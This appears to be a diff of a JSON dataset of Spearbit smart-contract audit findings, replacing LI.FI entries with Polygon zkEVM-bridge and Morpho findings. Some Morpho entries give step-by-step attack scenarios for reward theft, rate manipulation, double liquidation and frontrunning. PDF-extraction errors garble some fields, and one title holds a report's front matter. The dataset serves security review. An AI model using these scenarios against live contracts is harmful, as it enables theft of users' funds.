+ "title": "Incorrect/incomplete comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There are a few mistakes in the comments that can be corrected in the codebase.", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Check quoteTimestamp is within ten minutes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "quoteTimestamp is not validated. According to Across, quoteTimestamp variable, at which the depositor will be quoted for L1 liquidity. This enables the depositor to know the L1 fees before submitting their deposit. Must be within 10 mins of the current time. function _startBridge(AcrossData memory _acrossData) internal { bool isNative = _acrossData.token == ZERO_ADDRESS; if (isNative) _acrossData.token = _acrossData.weth; else LibAsset.maxApproveERC20(IERC20(_acrossData.token), _acrossData.spokePool, ,! _acrossData.amount); IAcrossSpokePool pool = IAcrossSpokePool(_acrossData.spokePool); pool.deposit{ value: isNative ? _acrossData.amount : 0 }( _acrossData.recipient, _acrossData.token, _acrossData.amount, _acrossData.destinationChainId, _acrossData.relayerFeePct, _acrossData.quoteTimestamp ); }", + "title": "Typos, grammatical and styling errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There are a few typos and grammatical mistakes that can be corrected in the codebase. Some functions could also be renamed to better reect their purposes.", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Integrate two versions of depositAsset()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function depositAsset(, , isNative ) doesnt check tokenId == NATIVE_ASSETID, although depositAsset(,) does. In the code base depositAsset(, , isNative ) isnt used. function depositAsset( address tokenId, uint256 amount, bool isNative ) internal { if (amount == 0) revert InvalidAmount(); if (isNative) { ... } else { ... } } function depositAsset(address tokenId, uint256 amount) internal { return depositAsset(tokenId, amount, tokenId == NATIVE_ASSETID); }", + "title": "Enforce parameters limits in initialize() of PolygonZkEVM", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function initialize() of PolygonZkEVM doesnt enforce limits on trustedAggregatorTime- out and pendingStateTimeout, whereas the update functions setTrustedAggregatorTimeout() and setPend- ingStateTimeout(). As the project has indicated it might be useful to set larger values in initialize(). function initialize(..., InitializePackedParameters calldata initializePackedParameters,...) ... { trustedAggregatorTimeout = initializePackedParameters.trustedAggregatorTimeout; ... pendingStateTimeout = initializePackedParameters.pendingStateTimeout; ... } function setTrustedAggregatorTimeout(uint64 newTrustedAggregatorTimeout) public onlyAdmin { require(newTrustedAggregatorTimeout <= HALT_AGGREGATION_TIMEOUT,....); ... trustedAggregatorTimeout = newTrustedAggregatorTimeout; ... } function setPendingStateTimeout(uint64 newPendingStateTimeout) public onlyAdmin { require(newPendingStateTimeout <= HALT_AGGREGATION_TIMEOUT, ... ); ... pendingStateTimeout = newPendingStateTimeout; ... }", "labels": [ "Spearbit", - "LIFI", + "zkEVM-bridge", "Severity: Informational" ] }, { - "title": "Simplify batchRemoveDex()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The code of batchRemoveDex() is somewhat difficult to understand and thus to maintain. function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } }", + "title": "Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 2 1 About Spearbit Spearbit is a decentralized network of expert security engineers offering reviews and other security related services to Web3 projects with the goal of creating a stronger ecosystem. Our network has experience on every part of the blockchain technology stack, including but not limited to protocol design, smart contracts and the Solidity compiler. Spearbit brings in untapped security talent by enabling expert freelance auditors seeking exibility to work on interesting projects together. Learn more about us at spearbit.com 2 Introduction Smart contract implementation which will be used by the Polygon-Hermez zkEVM. Disclaimer : This security review does not guarantee against a hack. It is a snapshot in time of zkEVM-Contracts according to the specic commit. Any modications to the code will require a new security review. 3 Risk classication Severity level Likelihood: high Likelihood: medium High Likelihood: low Medium Impact: High Impact: Medium Impact: Low Critical High Medium Low Medium Low Low 3.1 Impact High - leads to a loss of a signicant portion (>10%) of assets in the protocol, or signicant harm to a majority of users. Medium - global losses <10% or losses to only a subset of users, but still unacceptable. Low - losses will be annoying but bearable--applies to things like grieng attacks that can be easily repaired or even gas inefciencies. 3.2 Likelihood High - almost certain to happen, easy to perform, or not easy but highly incentivized Medium - only conditionally possible or incentivized, but still relatively likely Low - requires stars to align, or little-to-no incentive 3.3 Action required for severity levels Critical - Must x as soon as possible (if already deployed) High - Must x (before deployment if not already deployed) Medium - Should x Low - Could x 4 Executive Summary Over the course of 13 days in total, Polygon engaged with Spearbit to review the zkevm-contracts protocol. In this period of time a total of 68 issues were found. 3 Summary Project Name Polygon Repository Commit zkevm-contracts 5de59e...f899 Type of Project Cross Chain, Bridge Audit Timeline Jan 9 - Jan 25 Two week x period Jan 25 - Feb 8 Severity Critical Risk High Risk Medium Risk Low Risk Gas Optimizations Informational Total Issues Found Count Fixed Acknowledged 0 0 3 16 19 30 68 0 0 3 10 18 19 50 0 0 0 6 1 11 18 4 5 Findings 5.1 Medium Risk 5.1.1 Funds can be sent to a non existing destination", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function bridgeAsset() and bridgeMessage() do check that the destination network is different If accidentally the wrong than the current network. However, they dont check if the destination network exists. networkId is given as a parameter, then the function is sent to a nonexisting network. If the network would be deployed in the future the funds would be recovered. However, in the meantime they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination. function bridgeAsset(...) ... { require(destinationNetwork != networkID, ... ); ... } function bridgeMessage(...) ... { require(destinationNetwork != networkID, ... ); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "Error handing in executeCallAndWithdraw", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "If isContract happens to be false then success is false (as it is initialized as false and not updated) Thus the _withdrawAsset() will never happen. Function withdraw() also exist so this functionality isnt necessary but its more logical to revert earlier. 50 function executeCallAndWithdraw(...) ... { ... bool success; bool isContract = LibAsset.isContract(_callTo); if (isContract) { false // thus is false ,! (success, ) = _callTo.call(_callData); } if (success) { // if this is false, then success stays _withdrawAsset(_assetAddress, _to, _amount); // this never happens if isContract == false } else { revert WithdrawFailed(); } }", + "title": "Wrong P2P exchange rate calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "_p2pDelta is divided by _poolIndex and multiplied by _p2pRate, nevertheless it should have been multiplied by _poolIndex and divided by _p2pRate to compute the correct share of the delta. This leads to wrong P2P rates throughout all markets if supply / borrow delta is involved.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Critical Risk" ] }, { - "title": "_withdrawAsset() could use LibAsset.transferAsset()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "A large part of the function _withdrawAsset() is very similar to LibAsset.transferAsset(). function _withdrawAsset(...) ... { ... if (_assetAddress == NATIVE_ASSET) { address self = address(this); if (_amount > self.balance) revert NotEnoughBalance(_amount, self.balance); (bool success, ) = payable(sendTo).call{ value: _amount }(\"\"); if (!success) revert WithdrawFailed(); } else { assetBalance = IERC20(_assetAddress).balanceOf(address(this)); if (_amount > assetBalance) revert NotEnoughBalance(_amount, assetBalance); SafeERC20.safeTransfer(IERC20(_assetAddress), sendTo, _amount); } ... }", + "title": "MatchingEngineForAave is using the wrong totalSupply in updateBorrowers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "_poolTokenAddress is referencing AToken so the totalStaked would be the total supply of the AToken. In this case, the totalStaked should reference the total supply of the DebtToken, otherwise the user would be rewarded for a wrong amount of reward.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Critical Risk" ] }, { - "title": "anySwapOut() doesnt lower allowance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function anySwapOut() only seems to work with Anyswap tokens. It burns the received to- kens here: AnyswapV5Router.sol#L334 This burning doesnt use/lower the allowance, so the allowance will stay present. Also see howto: function anySwapOut ==> no need to approve. function _startBridge(...) ... { ... LibAsset.maxApproveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount); ... IAnyswapRouter(_anyswapData.router).anySwapOut(...); }", + "title": "RewardsManagerAave does not verify token addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Aave has 3 different types of tokens: aToken, stable debt token and variable debt token (a/s/vToken). Aaves incentive controller can define rewards for all of them but Morpho never uses a stable-rate borrows token (sToken). The public accrueUserUnclaimedRewards function allows passing arbitrary token addresses for which to accrue user rewards. Current code assumes that if the token is not the variable debt token, then it must be the aToken, and uses the users supply balance for the reward calculation as follows: 5 uint256 stakedByUser = reserve.variableDebtTokenAddress == asset ? positionsManager.borrowBalanceInOf(reserve.aTokenAddress, _user).onPool : positionsManager.supplyBalanceInOf(reserve.aTokenAddress, _user).onPool; An attacker can accrue rewards by passing in an sToken address and steal from the contract, i.e: Attacker supplies a large amount of tokens for which sToken rewards are defined. The aToken reward index is updated to the latest index but the sToken index is not initialized. Attacker calls accrueUserUnclaimedRewards([sToken]), which will compute the difference between the cur- rent Aave reward index and users sToken index, then multiply it by their supply balance. The user accumulated rewards in userUnclaimedRewards[user] can be withdrawn by calling PositionMan- ager.claimRewards([sToken, ...]). Attacker withdraws their supplied tokens again. The abovementioned steps can be performed in one single transaction to steal unclaimed rewards from all Morpho positions.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Critical Risk" ] }, { - "title": "Anyswap rebrand", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Anyswap is rebranded to Multichain see rebrand.", + "title": "FullMath requires overflow behavior", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "UniswapV3s FullMath.sol is copied and migrated from an old solidity version to version 0.8 which reverts on overflows but the old FullMath relies on the implicit overflow behavior. The current code will revert on overflows when it should not, breaking the SwapManagerUniV3 contract.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Check processing of native tokens in AnyswapFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The variable isNative seems to mean a wrapped native token is used (see function _getUnderly- ingToken() ). Currently startBridgeTokensViaAnyswap() skips LibAsset.depositAsset() when isNative == true, but a wrapped native tokens should also be moved via LibAsset.depositAsset(). Also _startBridge() tries to send native tokens with { value: _anyswapData.amount } then isNative == true, but this wouldnt work with wrapped tokens. The Howto seems to indicate an approval (of the wrapped native token) is neccesary. 52 contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard { ,! ,! function startBridgeTokensViaAnyswap(LiFiData calldata _lifiData, AnyswapData calldata _anyswapData) ... { { // Multichain (formerly Anyswap) tokens can wrap other tokens (address underlyingToken, bool isNative) = _getUnderlyingToken(_anyswapData.token, _anyswapData.router); if (!isNative) LibAsset.depositAsset(underlyingToken, _anyswapData.amount); ... } function _getUnderlyingToken(address token, address router) ... { ... if (token == address(0)) revert TokenAddressIsZero(); underlyingToken = IAnyswapToken(token).underlying(); // The native token does not use the standard null address ID isNative = IAnyswapRouter(router).wNATIVE() == underlyingToken; // Some Multichain complying tokens may wrap nothing if (!isNative && underlyingToken == address(0)) { underlyingToken = token; } } function _startBridge(... ) ... { ... if (isNative) { IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(...); // ,! send native tokens } ... } }", + "title": "Morphos USDT mainnet market can end up in broken state", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Note that USDT on Ethereum mainnet is non-standard and requires resetting the approval to zero (see USDT L199) before being able to change it again. In _repayERC20ToPool , it could be that _amount is approved but then _amount = Math.min(...) only repays a smaller amount, meaning there remains a non-zero approval for Aave. Any further _repayERC20ToPool/_- supplyERC20ToPool calls will then revert in the approve call. Users cannot interact with most functions of the Morpho USDT market anymore. Example: Assume the attacker is first to borrow from the USDT market on Morpho. Attacker borrows 1000 USDT through Morpho from the Aave pool (and some other collateral to cover the debt). Attacker directly interacts with Aave to repay 1 USDT of debt for Aaves Morpho account position. Attacker attempts to repay 1000 USDT on Morpho. the contracts debt balance is only 999 and the _amount = Math.min(_amount, variableDebtTo- ken.scaledBalanceOf(address(this)).mulWadByRay(_normalizedVariableDebt) computation will only repay 999. An approval of 1 USDT remains. It will approve 1000 USDT but The USDT market is broken as it reverts on supply / repay calls when trying to approve the new amount", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Remove payable in swapAndCompleteBridgeTokensViaStargate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant The function swapAndCompleteBridgeTokensViaStargate of Executor is payable but doesnt receive native to- kens. 53 contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { // not payable ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); // ,! doesn't send native assets ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { // is payable if (msg.sender != address(this)) { revert InvalidCaller(); } } }", + "title": "Wrong reserve factor computation on P2P rates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The reserve factor is taken on the entire P2P supply and borrow rates instead of just on the spread of the pool rates. Its currently overcharging suppliers and borrowers and making it possible to earn a worse rate on Morpho than the pool rates. supplyP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS - reserveFactor[_marketAddress])) / MAX_BASIS_POINTS; borrowP2PSPY[_marketAddress] = (meanSPY * (MAX_BASIS_POINTS + reserveFactor[_marketAddress])) / MAX_BASIS_POINTS;", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Use the same order for inherited contracts.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The inheritance of contract isnt always done in the same order. For code consistency its best to always put them in the same order. contract AmarokFacet contract AnyswapFacet contract ArbitrumBridgeFacet contract CBridgeFacet contract GenericSwapFacet contract GnosisBridgeFacet contract HopFacet contract HyphenFacet contract NXTPFacet contract OmniBridgeFacet contract OptimismBridgeFacet contract PolygonBridgeFacet contract StargateFacet contract GenericBridgeFacet contract WormholeFacet contract AcrossFacet contract Executor is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, ReentrancyGuard { is ILiFi, ReentrancyGuard, Swapper { is ILiFi, ReentrancyGuard, SwapperV2 { is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {", + "title": "SwapManager assumes Morpho token is token0 of every token pair", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The consult function wrongly assumes that the Morpho token is always the first token (token0) in the Morpho <> Reward token token pair. This could lead to inverted prices and a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Catch potential revert in swapAndStartBridgeTokensViaStargate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The following statement nativeFee -= _swapData[i].fromAmount; can revert in the swapAnd- StartBridgeTokensViaStargate(). function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) { nativeFee -= _swapData[i].fromAmount; // can revert } } ... }", + "title": "SwapManager fails at updating TWAP", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The update function returns early without updating the TWAP if the elapsed time is past the TWAP period. Meaning, once the TWAP period passed the TWAP is stale and forever represents an old value. This could lead to a denial of service attack when claiming rewards as the wrongly calculated expected amount slippage check reverts.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "No need to use library If It is in the same file", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the LibAsset, some of the functions are called through LibAsset., however there is no need to call because the functions are in the same solidity file. ... ... if (msg.value != 0) revert NativeValueWithERC(); uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId); LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount); if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount();", + "title": "P2P rate can be manipulated as its a lazy-updated snapshot", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The P2P rate is lazy-updated upon interactions with the Morpho protocol. It takes the mid-rate of Its possible to manipulate these rates before triggering an update on the current Aave supply and borrow rate. Morpho. function _updateSPYs(address _marketAddress) internal { DataTypes.ReserveData memory reserveData = lendingPool.getReserveData( IAToken(_marketAddress).UNDERLYING_ASSET_ADDRESS() ); uint256 meanSPY = Math.average( reserveData.currentLiquidityRate, reserveData.currentVariableBorrowRate ) / SECONDS_PER_YEAR; // In ray } Example: Assume an attacker has a P2P supply position on Morpho and wants to earn a very high APY on it. He does the following actions in a single transaction: Borrow all funds on the desired Aave market. (This can be done by borrowing against flashloaned collateral). The utilisation rate of the market is now 100%. The borrow rate is the max borrow rate and the supply rate is (1.0 - reserveFactor) * maxBorrowRate. The max borrow rate can be higher than 100% APY, see Aave docs. The attacker triggers an update to the P2P rate, for example, by supplying 1 token to the pool Positions- ManagerForAave.supply(poolTokenAddress, 1, ...), triggering marketsManager.updateSPYs(_poolTo- kenAddress). The new mid-rate is computed which will be (2.0 - reserveFactor) * maxBorrowRate / 2 ~ maxBor- rowRate. The attacker repays their Aave debt in the same transaction, not paying any interest on it. All P2P borrowers now pay the max borrow rate to the P2P suppliers until the next time a user interacts with the market on Morpho. This process can be repeated to keep the APY high.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Combined Optimism and Synthetix bridge", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Optimism bridge also includes a specific bridge for Synthetix tokens. Perhaps it is more clear to have a seperate Facet for this. function _startBridge(...) ... { ... if (_bridgeData.isSynthetix) { bridge.depositTo(_bridgeData.receiver, _amount); } else { ... } }", + "title": "Liquidating Morphos Aave position leads to state desynchronization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Morpho has a single position on Aave that encompasses all of Morphos individual user positions that are on the pool. When this Aave Morpho position is liquidated the user position state tracked in Morpho desynchronize from the actual Aave position. This leads to issues when users try to withdraw their collateral or repay their debt from Morpho. Its also possible to double-liquidate for a profit. Example: Theres a single borrower B1 on Morpho who is connected to the Aave pool. B1 supplies 1 ETH and borrows 2500 DAI. This creates a position on Aave for Morpho The ETH price crashes and the position becomes liquidatable. A liquidator liquidates the position on Aave, earning the liquidation bonus. They repaid some debt and seized some collateral for profit. This repaid debt / removed collateral is not synced with Morpho. The users supply and debt balance remain 1 ETH and 2500 DAI. The same user on Morpho can be liquidated again because Morpho uses the exact same liquidation parameters as Aave. The Morpho liquidation call again repays debt on the Aave position and withdraws collateral with a second liquidation bonus. The state remains desynced.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: High Risk" ] }, { - "title": "Doublecheck the Diamond pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The LiFi protocol uses the diamond pattern. This pattern is relative complex and has overhead for the delegatecall. There is not much synergy between the different bridges (except for access controls & white lists). By combining all the bridges in one contract, the risk of one bridge might have an influence on another bridge.", + "title": "Frontrunners can exploit the system by not allowing head of DLL to match in P2P", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "For a given asset X, liquidity is supplied on the pool since there are not enough borrowers. suppli- ersOnPool head: 0xa with 1000 units of x Whenever there is a new transaction in the mempool to borrow 100 units of x: Frontrunner supplies 1001 units of x and is supplied on pool. updateSuppliers will place the frontrunner on the head (assuming very high gas is supplied). Borrowers transaction lands and is matched 100 units of x with a frontrunner in p2p. Frontrunner withdraws the remaining 901 left which was on the underlying pool. Favorable conditions for an attack: Relatively fewer gas fees & relatively high block gas limit. insertSorted is able to traverse to head within block gas limit (i.e length of DLL). Since this is a non-atomic sandwich, the frontrunner needs excessive capital for a blocks time period.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Reference Diamond standard", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The LiFiDiamond.sol contract doesnt contain a reference to the Diamond contract. Having that would make it easier for readers of the code to find the origin of the contract.", + "title": "TWAP intervals should be flexible as per market conditions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "The protocol is using the same TWAP_INTERVAL for both weth-morpho and weth-reward token pool while their liquidity and activity might be different. It should use separate appropriate values for both pools.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Validate Nxtp InvariantTransactionData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been noticed that InvariantTransactionDatas fields are not validated. Even if the validation located in the router, sendingChainFallback and receivingAddress parameters are sensible and connext does not have meaningful error message on these parameter validation. Also, router parameter does not have any validation. Most of the other facets have. For instance : Amarok Facet Note: also see issue \"Hardcode bridge addresses via immutable\" function _startBridge(NXTPData memory _nxtpData) private returns (bytes32) { ITransactionManager txManager = ITransactionManager(_nxtpData.nxtpTxManager); IERC20 sendingAssetId = IERC20(_nxtpData.invariantData.sendingAssetId); // Give Connext approval to bridge tokens LibAsset.maxApproveERC20(IERC20(sendingAssetId), _nxtpData.nxtpTxManager, _nxtpData.amount); uint256 value = LibAsset.isNativeAsset(address(sendingAssetId)) ? _nxtpData.amount : 0; // Initiate bridge transaction on sending chain ITransactionManager.TransactionData memory result = txManager.prepare{ value: value }( ITransactionManager.PrepareArgs( _nxtpData.invariantData, _nxtpData.amount, _nxtpData.expiry, _nxtpData.encryptedCallData, _nxtpData.encodedBid, _nxtpData.bidSignature, _nxtpData.encodedMeta ) ); return result.transactionId; }", + "title": "PositionsManagerForAave claimToTreasury could allow sending underlying to 0x address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "claimToTreasury is currently not verifying if the treasuryVault address is != address(0). In the current state, it would allow the owner of the contract to burn the underlying token instead of sending it to the intended treasury address.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Executor contract should not handle cross-chain swap from Connext", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Executor contract is designed to handle a swap at the destination chain. The LIFI protocol may build a cross-chain transaction to call Executor.swapAndCompleteBridgeTokens at the destination chain. In order to do a flexible swap, the Executor can perform arbitrary execution. Executor.sol#L323-L333 57 function _executeSwaps( LiFiData memory _lifiData, LibSwap.SwapData[] calldata _swapData, address payable _receiver ) private noLeftovers(_swapData, _receiver) { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } However, the receiver address is a privileged address in some bridging services. Allowing users to do arbitrary execution/ external calls is dangerous. The Connext protocol is an example : Connext contractAPI#cancel The receiver address can prematurely cancel a cross-chain transaction. When a cross-chain execution is canceled, the funds would be sent to the fallback address without executing the external call. Exploiters can front-run a gelato relayer and cancel a cross-chain execution. The (post-swap) tokens will be sent to the receivers address. The exploiters can grab the tokens left in the Executor in the same transaction.", + "title": "rewardsManager used in MatchingEngineForAave could be not initialized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "MatchingEngineForAave update the userUnclaimedRewards for a supplier/borrower each time it gets updated. rewardsManager is not initialized in PositionsManagerForAaveLogic.initialize but only via Po- sitionsManagerForAaveGettersSetters.setRewardsManager, which means that it will start as address(0). Each time a supplier or borrower gets updated and the rewardsManager address is empty, the transaction will revert. To replicate the issue, just comment positionsManager.setRewardsManager(address(rewardsManager)); in TestSetup and run make c-TestSupply. All tests will fail with [FAIL. Reason: Address: low-level delegate call failed]", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Avoid using strings in the interface of the Axelar Facet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The Axelar Facet uses strings to indicate the destinationChain, destinationAddress, which is different then on other bridge facets. function executeCallWithTokenViaAxelar( string memory destinationChain, string memory destinationAddress, string memory symbol, ... ) ...{ } The contract address is (or at least can be) encoded as a hex string, as seen in this example: /// https://etherscan.io/tx/0x7477d550f0948b0933cf443e9c972005f142dfc5ef720c3a3324cefdc40ecfa2 # 0 1 2 3 4 Type Name destinationChain string destinationContractAddress payload symbol amount bytes string uint256 50000000 0xA57ADCE1d2fE72949E4308867D894CD7E7DE0ef2 Data binance string USDC 58 The Axelar bridge allows bridging to non EVM chains, however the LiFi protocol doesnt seem to support thus. So its good to prevent accidentally sending to non EVM chains. Here are the supported non EVM chains: non-evm- networks The Axelar interface doesnt have a (compatible) emit.", + "title": "Missing input validation checks on contract initialize/constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Contract creation/initialization of a contract in a wrong/inconsistent state. initialize/constructor input parameters should always be validated to prevent the", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Hardcode source Nomad domain ID via immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "AmarokFacet takes source domain ID as a user parameter and passes it to the bridge: originDomain: _bridgeData.srcChainDomain User provided can be incorrect, and Connext will later revert the transaction. See BridgeFacet.sol#L319-L321: if (_args.params.originDomain != s.domain) { revert BridgeFacet__xcall_wrongDomain(); }", + "title": "Setting a new rewards manager breaks claiming old rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "Setting a new rewards manager will break any old unclaimed rewards as users can only claim through the PositionManager.claimRewards function which then uses the new reward manager.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Morpho", + "Severity: Medium Risk" ] }, { - "title": "Amount swapped not emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The emits LiFiTransferStarted() and LiFiTransferCompleted() dont emit the amount after the swap (e.g. the real amount that is being bridged / transferred to the receiver). This might be useful to add. 59 event LiFiTransferStarted( bytes32 indexed transactionId, string bridge, string bridgeData, string integrator, address referrer, address sendingAssetId, address receivingAssetId, address receiver, uint256 amount, uint256 destinationChainId, bool hasSourceSwap, bool hasDestinationCall ); event LiFiTransferCompleted( bytes32 indexed transactionId, address receivingAssetId, address receiver, uint256 amount, uint256 timestamp );", + "title": "Low/high MaxGas values could make match/unmatch supplier/borrower functions always fail or revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Spearbit-Security-Review.pdf", + "body": "maxGas variable is used to determine how much gas the matchSuppliers, unmatchSuppliers, matchBorrowers and 